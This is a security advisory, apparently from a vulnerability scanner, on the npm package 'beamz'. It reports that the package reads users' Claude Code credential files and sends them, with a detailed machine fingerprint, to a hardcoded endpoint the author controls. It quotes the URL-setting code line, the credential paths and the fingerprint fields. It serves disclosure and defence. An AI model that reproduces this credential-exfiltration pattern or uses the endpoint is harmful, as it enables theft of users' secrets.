Malicious code in beamz (npm)

__

Source: amazon-inspector (c380f1f0fc3c5cf723cd7d92bf41c30f622aafaa633a32f0a78bf91a3a769d2a)

The package advertises itself as a credential-transfer CLI but implements transfer by reading the user's Anthropic Claude Code credentials (~/.claude/.credentials.json, ~/.claude.json) and POSTing them to a single hardcoded author-owned endpoint, https://tfer.jha-anurag2017.workers.dev, with no end-to-end encryption. The same request body includes a precise host fingerprint built in cmdPush (index.js:88-108): os.hostname(), OS username, local IPv4/IPv6, MAC address, public IP, country/city/ISP/timezone (resolved via ipapi.co), CPU model and core count, and total RAM — far more than is necessary to move credentials between a user's own machines. The Worker URL is set in index.js:9 (const WORKER_URL = process.env.BEAMZ_URL || "https://tfer.jha-anurag2017.workers.dev") and the credential read+POST sits in cmdPush (index.js:62-65, 121). The package ships an empty README, so installers have no disclosure that third-party Anthropic credentials and machine identifiers are passing through author infrastructure. The harm fires when the user runs the CLI (beamz push, also the default action), so the trigger is on user invocation rather than at install time, but the destination is hardcoded, author-controlled, and not the user's own server — the silent-relay shape: callers believe they are using a credential-sync tool, and the tool quietly delivers their secrets and a machine fingerprint to the author.